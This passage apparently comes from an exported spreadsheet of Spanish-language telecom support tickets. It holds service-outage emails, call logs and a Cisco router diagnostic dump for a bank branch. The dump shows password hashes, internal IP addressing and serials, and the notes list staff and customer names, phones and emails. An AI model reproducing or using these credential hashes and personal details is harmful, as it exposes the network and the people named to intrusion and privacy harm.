CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; FRANCISCO JAVIER ALVARADO TREJO &lt;FRANCISCO.ALVARADO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; MARLON ESTUARDO RAMOS &lt;RAMOS.MARLON@CLARO.COM.GT&gt;; SAMUEL ANTONIO ESTRADA GREGORIO &lt;SAMUEL.ESTRADAG@CLARO.COM.GT&gt;; ROMANO LOPEZ GILBERTO ADOLFO &lt;RLOPEZG@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: GRUPO MODELO LATAM - CHALATENANGO - AKM-M03975SV-SV7303-NP [IP2033160] - SLOWNESS || IMGMD005027
BUENOS DÍAS ESTIMADO SR. CARRILLO.
                LAMENTAMOS LOS INCONVENIENTES, SE SOLICITA APOYO AL PERSONAL DE CNOC CLARO PARA LA REVISIÓN.
ESPERAMOS COMPARTIR AVANCES A LA BREVEDAD POSIBLE.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: CARRILLO MONTERO JOSE ANGEL [MAILTO:CMONTERJ@UNINET.COM.MX]
ENVIADO EL: DOMINGO, 15 DE MAYO DE 2022 05:18
PARA: KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; ROMANO LOPEZ GILBERTO ADOLFO &lt;RLOPEZG@UNINET.COM.MX&gt;; MARLON ESTUARDO RAMOS &lt;RAMOS.MARLON@CLARO.COM.GT&gt;; SAMUEL ANTONIO ESTRADA GREGORIO &lt;SAMUEL.ESTRADAG@CLARO.COM.GT&gt;; FRANCISCO JAVIER ALVARADO TREJO &lt;FRANCISCO.ALVARADO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: GRUPO MODELO LATAM - CHALATENANGO - AKM-M03975SV-SV7303-NP [IP2033160] - SLOWNESS || IMGMD005027
BUEN DIA TEAM
NOS COMPARTEN POR FAVOR ACTUALIZACIÓN DEL CASO, QUEDAMOS AL PENDIENTE.
SALUDOS/BEST REGARDS</t>
  </si>
  <si>
    <t>F4563539</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MILTON GUZMAN AL 53006936 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001584162
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MILTON GUZMAN AL 53006936 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 2001601151
**</t>
  </si>
  <si>
    <t>F4563543</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANIBAL PEREZ 48428426 ENVIA DIRECTAMENTE A BUZON, SE INTENTARA LUEGO
-ID 2001596547</t>
  </si>
  <si>
    <t>F4563545</t>
  </si>
  <si>
    <t>SE LLAMA A CIENTE SR. MANFREDO MAX  32882288 INFORMA QUE NO ESTA EN SITIO REMOTO, SE LE INFORMA QUE SU SWITCH SE ESTA REINICIANDO O DESCONECTANDO, SOLICITARA QUE REVISEN LOS EQUIPOS INTERNOS, SOLICITA QUE SE LLAME EN UNA HORA PARA VLAIDAR ENLACE. ID: 2001473838.</t>
  </si>
  <si>
    <t>F4563614</t>
  </si>
  <si>
    <t>SE PROCEDE A LLAMAR AL CLIENTE, SE ME INDICA QUE ME PASARAN LA LLAMADA CON EL TECNICO PARA VALIDAR PERO SE CORTA AL MOMENTO, SE VOLVERA A LLAMAR.
2001886892
COLA:
NOMBRE: A: 24230000
NÚMERO: 24230000
DURACIÓN: 0:08:28
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24230000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 17/05/2022 11:08:23</t>
  </si>
  <si>
    <t>SE LLAMA A NUMERO 24230000 ATIENDE ESMERALDA DE SAC, TRASLADA LA LLAMADA  A SISTEMAS PERO NO SE LOGRA COMUNICACION.
ID
2001209166
COLA:
NOMBRE: A: 24230000
NÚMERO: 24230000
DURACIÓN: 0:02:23
ESTADO: CONECTADA
DETALLES: 24230000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 25/05/2022 16:06:25</t>
  </si>
  <si>
    <t>DEBIDO A QUE NO SE LOGRA COMUNICACION VIA LLAMADA SE PROCEDE A ENVIAR CORREO
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE ALARMADO EN NUESTRO MONITOREO PARA EL PUNTO DE VENTA CC_DISTELSA_GT_3G_1A_CALLE_ZONA9, SOLICITAMOS SU APOYO CON LO REQUERIDO EN CORREO QUE ANTECEDE.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t xml:space="preserve"> SE INTENTA LLAMAR A SISTEMAS PERO INDICAN QUE SE ENCUENTRAN EN HORARIO DE ALMUERZO POR LO QUE SOLICITA QUE SE LLAME NUEVAMENTE A LAS 14:30
2001154897
COLA:
NOMBRE: A: 24230000
NÚMERO: 24230000
DURACIÓN: 0:04:24
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24230000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 25/05/2022 13:15:06</t>
  </si>
  <si>
    <t>SE SE LLAMA A ATENCIÓN AL CLIENTE SE LE SOLICITA TRANSFERIR LLAMADA AL ÁREA DE SISTEMAS INDICA, SE TRANSFIIERE PERO INDICA QUE DEJARON DE LABORAR A LAS 17:00 HORAS, INDICA SE LES LLAME A LAS 8:00 HORAS | | PARA CONSULTAR SI TIENEN FECHA CUANDO ENCENDERAN EQUIPOS EN PUNTO REMOTO.
2001007494
COLA:
NOMBRE: A: 24230000
NÚMERO: 24230000
DURACIÓN: 0:02:13
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24230000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 24/05/2022 17:36:27</t>
  </si>
  <si>
    <t>SE INTENTA COMUNICACIÓN CON NÚMERO PROPORCIONADO, PERO NO RESPONDEN
1001595623
COLA:
NOMBRE: A: 24361008
NÚMERO: 24361008
DURACIÓN: 0:00:49
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 24361008
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 23/05/2022 09:46:01
1001596017
COLA:
NOMBRE: A: 24361008
NÚMERO: 24361008
DURACIÓN: 0:00:41
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24361008
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 23/05/2022 09:47:00</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DE ANTONY MONTUFAR, INDICA QUE YA VALIDO DE QUE TIENDA SE TRATA E INFORMA QUE EN EL LUGAR TIENEN APAGADO EL EQUIPO POR TEMA DE PERSONAL, NO TIENE CONOCIMIENTO CUANTO TIEMPO LO TENDRAN ASÍ. SE LE SOLICITA UNA DIRECCIÓN DE CORREO ELECTRONICO PARA QUE SE NOS INFORME POR DICHO MEDIO.
SE LE ENVIA CORREO, EN ESPERA DE RESPUESTA.
DE: WILLIAM GABRIEL SANAVRIA
ENVIADO: LUNES, 23 DE MAYO DE 2022 11:05
PARA: AMONTUFA@DISTELSA.COM.GT &lt;AMONTUFA@DISTELSA.COM.GT&gt;; FESQUIVEL@DISTELSA.COM.GT &lt;FESQUIVEL@DISTELSA.COM.GT&gt;; DROSALES@DISTELSA.COM.GT &lt;DROSALES@DISTELSA.COM.GT&gt;; KSABALLOS@DISTELSA.COM.GT &lt;KSABALLOS@DISTELSA.COM.GT&gt;; LUIS PÉREZ CABRERA &lt;LPEREZ@DISTELSA.COM.GT&gt;; SGAITAN@DISTELSA.COM.GT &lt;SGAITAN@DISTELSA.COM.GT&gt;
CC: BRENDA.AGUIRRE@CLARO.COM.GT &lt;BRENDA.AGUIRRE@CLARO.COM.GT&gt;; DAVID.LARRANAGA@CLARO.COM.GT &lt;DAVID.LARRANAGA@CLARO.COM.GT&gt;; JOSE.ESTRADA@CLARO.COM.GT &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; KEVYN.FONSECA@CLARO.COM.GT &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; CNOCCA@CLARO.COM.GT &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS@CLARO.COM.GT &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: ENLACE ALARMADO CC_DISTELSA_GT_3G_1A_CALLE_ZONA9
ESTIMADO CLIENTE,
LES SALUDO CORDIALMENTE, AL MISMO TIEMPO LE INFORMO QUE TENEMOS ALARMA CON RESPECTO AL SERVICIO DETALLADO A CONTINUACIÓN:
TICKET: F4563614
ID: 61200229T
IDENTIFICADOR DEL CLIENTE: CC_DISTELSA_GT_3G_1A_CALLE_ZONA9
UBICADO EN: 50259784741_1A CALLE 7-66 ZONA 9GUATEMALA GUATEMALA
SE HABLÓ CON ANTONY MONTUFAR QUIEN COMENTA QUE EL EQUIPO EN DICHA TIENDA ESTÁ APAGADO POR TEMA DE PERSONAL. SOLICITAMOS DE SU AMABLE APOYO INFORMANDO POR ESTE MEDIO EL TIEMPO QUE EL EQUIPO PERMANECERÁ APAGADO.
DE ANTEMANO MUY AGRADECIDO POR SU ATENCIÓN Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 15 DE MAYO DE 2022 11:28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CC_DISTELSA_GT_3G_1A_CALLE_ZONA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3614
ID: 61200229T
IDENTIFICADOR DEL CLIENTE:  CC_DISTELSA_GT_3G_1A_CALLE_ZONA9
UBICADO EN:  50259784741_1A CALLE 7-66 ZONA 9GUATEMALA GUATEMALA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SIN RESPUESTA DEL DISTELSA, SE LLAMARA EN OTRO MOMENTO.
2001897483
COLA:
NOMBRE: A: 24361008
NÚMERO: 24361008
DURACIÓN: 0:01:04
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NINGÚN USUARIO RESPONDE (CÓDIGO CAUSA ISDN 18)/480:SIP - NO DISPONIBLE TEMPORALMENTE]
DETALLES: 24361008
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 17/05/2022 11:25:53</t>
  </si>
  <si>
    <t>SE TERMINA LA LLAMDA CON EL CLIENTE RESPONDE ANTONY MONTUFAR DONDE ME INDICA QUE ESTE ID ES PRA UNA VENTA MOVIL DE EDISTELSAY POSIBLE QUE ELLOS ACTUALMENTE ESTEN MOVIENDO LOS EQUIPOS POR LO QUE SE ESTAN INTENTANDO COMUNICAR CON ESE DISTELSA PERO NO SE TIENE RESPUESTA, ME PROPORCIONAN EL NUMERO 24361008  SE INTENTARA LLAMAR PARA HACER PRUEBAS.
2001891227
COLA:
NOMBRE: A: 24230000
NÚMERO: 24230000
DURACIÓN: 0:12:41
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24230000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 17/05/2022 11:22:40</t>
  </si>
  <si>
    <t>F4563634</t>
  </si>
  <si>
    <t>--- NO SE LOGRA COMUNICACION CON CNOC PROACTIVO, SE ESTA LLAMANDO A CNOC REACTIVO. ...
RESULTADO: LLAMADA HECHA
NOMBRE: SISTEMA
NÚMERO: 8024
INICIO: HOY, 07:09
FIN: HOY, 07:10
DURACIÓN: 1:04
ID DE LLAMADA: 2001494278
...</t>
  </si>
  <si>
    <t>--- EN LINEA CON STEISY 506 70191437 (CLIENTE DEL PUNTO REMOTO), SE ESTA LLAMANDO A CNOC PROACTIVO. ...</t>
  </si>
  <si>
    <t>--- SE RECIBE CORREO DEL CLIENTE. ...
DE: JEFFERSON ARCE (VENDOR)
ENVIADO: DOMINGO, 15 DE MAYO DE 2022 06:45
PARA: CORPOWALMART; KANDY KRYSTINA CORONADO RAMON; NOE PEREZ; CNOCCA; GRUPO N1
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA
ASUNTO: RE: ENLACE CAÍDO DE PALI SAN ROQUE ID: CONTR0001542310OC
BUENOS DÍAS
EL CONTACTO QUE TENEMOS CON LA TIENDA SERIA POR MEDIO DEL NUMERO 506 7019 1437, GRACIAS
SALUDOS
...</t>
  </si>
  <si>
    <t>--- SE DEJA EN CONFERENCIA A JURGUEN BOCH Y STEISY 506 70191437 (CLIENTE DEL PUNTO REMOTO). ...
RESULTADO: LLAMADA HECHA
NOMBRE: PARTICIPANTE DE CONFERENCIA
NÚMERO:
INICIO: HOY, 07:19
FIN: HOY, 07:19
DURACIÓN: 0:17
ID DE LLAMADA: 2001494510
RESULTADO: LLAMADA HECHA
NOMBRE: JURGEN RENE BOCH CAAL
NÚMERO: 4881
INICIO: HOY, 07:18
FIN: HOY, 07:19
DURACIÓN: 0:43
ID DE LLAMADA: 2001494488
RESULTADO: LLAMADA HECHA
NOMBRE: 41284612
NÚMERO: 41284612
INICIO: HOY, 07:14
FIN: HOY, 07:20
DURACIÓN: 5:57
ID DE LLAMADA: 2001494371
...</t>
  </si>
  <si>
    <t>--- KEVYN FONSECA SOLICITA QUE SE MARQUE A LA EXT. 4881 CON JURGUEN BOCH. ...</t>
  </si>
  <si>
    <t>--- SE RESPONDE CORREO. ...
DE: DIEGO PABLO AJIN HERNANDEZ
ENVIADO: DOMINGO, 15 DE MAYO DE 2022 07:24
PARA: JEFFERSON ARCE (VENDOR); CORPOWALMART; KANDY KRYSTINA CORONADO RAMON; NOE PEREZ; CNOCCA; GRUPO N1
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA
ASUNTO: RE: ENLACE CAÍDO DE PALI SAN ROQUE ID: CONTR0001542310OC
JEFFERSON BUENOS DÍAS.
                GRACIAS POR LA INFORMACIÓN, ACTUALMENTE PERSONAL A CARGO SE ENCUENTRA EN LINEA CON EL PUNTO REMOTO REALIZANDO PRUEBAS.
QUEDAMOS A LA ESPERA DE LOS COMENTARIOS POR PARTE DE CNOC CA AL CONCLUIR EL AUDIO.
ATENTAMENTE:
DIEGO AJIN
...</t>
  </si>
  <si>
    <t>--- NO SE LOGRA COMUNICACION CON CNOC REACTIVO, SE PROCEDE A ESCALAR. ...
RESULTADO: LLAMADA HECHA
NOMBRE: SISTEMA
NÚMERO: 8126
INICIO: HOY, 07:11
FIN: HOY, 07:12
DURACIÓN: 1:02
ID DE LLAMADA: 2001494309
...</t>
  </si>
  <si>
    <t>F4563725</t>
  </si>
  <si>
    <t xml:space="preserve">EL SERVICIO YA SE ENCUNTRA OPERATIVO Y ACABA DE ARRANCAR HACE 4 MINUTOS SE PROCEDE CON CIERRE
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 4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163 UPTIME IS 4 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 06:49:57 UTC SUN MAY 15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7Y194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7Y194
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_0163#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4164 BYTES
!
! NO CONFIGURATION CHANGE SINCE LAST RESTART
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_0163
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 4 EFGGPN07/DWJB.UGZOURJMJZHPAPLRUWH/NVNVXUK6.
!
NO AAA NEW-MODEL
!
NO IPV6 CEF
!
!
!
!
!
NO IP DOMAIN LOOKUP
IP CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX1617Y194
!
!
USERNAME GESTIONIP SECRET 4 J97D2KYDSNA1WFDCO/9OZ72YEJCXHSGT1W6FUL8O/O.
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.120.35 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/8902274T/_/
 BANDWIDTH 4096
 IP ADDRESS 10.72.193.96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
 DESCRIPTION WAN REDUNDANTE/_/8902268/_/
 BANDWIDTH 2048
 IP ADDRESS 10.72.193.156 255.255.255.192
 RATE-LIMIT INPUT 2048000 384000 768000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 384000 768000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO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1.63.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.161.63.126 255.255.255.0
 NO AUTOSTATE
!
INTERFACE ASYNC1
 NO IP ADDRESS
 ENCAPSULATION SLIP
!
ROUTER OSPF 1
 ROUTER-ID 10.72.193.96
 AREA 164 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.72.193.64 0.0.0.63 AREA 164
 NEIGHBOR 10.72.193.65
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.72.193.129 220 NAME REDUNDANCIA
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 10.161.63.0/24
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.212.120.35/32
IP PREFIX-LIST CONNECTED SEQ 15 PERMIT 10.131.63.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BARRIO SAN FRANCISCO FRENTE AL PARQUE CUNEN SANTA CRU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163#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 25 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 25 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 29 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
JAN  2 12:00:02.591: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
MAY 15 06:50:13.603: %ESWMRVL_FLTMG-5-NOTICE: NOTICE: FPGA REV 0X71
MAY 15 06:50:18.443: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO RESET
MAY 15 06:50:18.443: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO RESET
MAY 15 06:50:19.431: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
MAY 15 06:50:19.443: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
MAY 15 06:50:19.443: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 15 06:50:20.495: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
MAY 15 06:50:20.495: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 15 06:50:20.803 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
MAY 15 06:50:21.723 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
MAY 15 06:50:21.787 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
MAY 15 06:50:22.691 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
MAY 15 06:50:22.755 UTC: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/1, CHANGED STATE TO ADMINISTRATIVELY DOWN
MAY 15 06:50:22.755 UTC: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/2, CHANGED STATE TO ADMINISTRATIVELY DOWN
MAY 15 06:50:22.755 UTC: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO ADMINISTRATIVELY DOWN
MAY 15 06:50:22.903 UTC: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO UP
MAY 15 06:50:23.407 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(2)T1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2012 BY CISCO SYSTEMS, INC.
COMPILED WED 29-FEB-12 19:19 BY PROD_REL_TEAM
MAY 15 06:50:23.587 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_BANRURAL_GT_AGENCIA_0163 IS UNDERGOING A COLD START
MAY 15 06:50:24.207 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
MAY 15 06:50:24.207 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/1, CHANGED STATE TO DOWN
MAY 15 06:50:24.207 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/2, CHANGED STATE TO DOWN
MAY 15 06:50:24.207 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO DOWN
MAY 15 06:50:24.207 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO UP
MAY 15 06:50:57.911 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.193.65 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
CC_BANRURAL_GT_AGENCIA_0163#
SHOW CLOCK
06:54:13.847 UTC SUN MAY 15 2022
CC_BANRURAL_GT_AGENCIA_0163#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.193.65            1   DC99.147A.A501  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.193.91            3   C0FF.A821.F377  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.193.93            3   3458.40C8.83D1  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.193.94            3   00D0.D65D.88D8  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.193.96            -   2C54.2DA7.5AC0  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.193.125           3   C0FF.A821.D3FF  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.193.126           3   00D0.D65A.4DF4  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.193.129           1   DC99.147A.A501  ARPA   GIGABITETHERNET0/1
INTERNET  10.72.193.156           -   2C54.2DA7.5AC1  ARPA   GIGABITETHERNET0/1
INTERNET  10.131.63.17            -   2C54.2DA7.5AC3  ARPA   VLAN1
INTERNET  10.131.63.22            0   F08E.DB17.91CE  ARPA   VLAN1
INTERNET  10.161.63.126           -   2C54.2DA7.5AC3  ARPA   VLAN1
CC_BANRURAL_GT_AGENCIA_0163#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/8902274T/_/
GI0/1                          UP             UP       WAN REDUNDANTE/_/8902268/_/
FA0/0/0                        UP             UP       LAN DEL CLIENTE
FA0/0/1                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/2                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/3                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
AS1                            DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_BANRURAL_GT_AGENCIA_0163#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.72.193.96    YES NVRAM  UP                    UP
GIGABITETHERNET0/1         10.72.193.156   YES NVRAM  UP                    UP
FASTETHERNET0/0/0          UNASSIGNED      YES UNSET  UP                    UP
FASTETHERNET0/0/1          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/2          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/3          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
ASYNC1                     UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5                  10.212.120.35   YES NVRAM  UP                    UP
VLAN1                      10.161.63.126   YES NVRAM  UP                    UP
CC_BANRURAL_GT_AGENCIA_0163#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BANRURAL 10.72.193.96
  PING 10.72.193.96: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.193.96 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.35
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.72.193.96
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.72.193.96/32  DIRECT  0    0                 0.0.0.0         VLANIF184			</t>
  </si>
  <si>
    <t xml:space="preserve">EL SERVICIO SE ENCUENTRA CAIDO  POSIBLE PROBLEMA DE ENERGIA COMERCIAL SE PORCEDERA A VALIDAR LA ULTIMA MILLA.
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
SERVICIO REDUNDANTE.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN BANRURAL 10.72.193.156
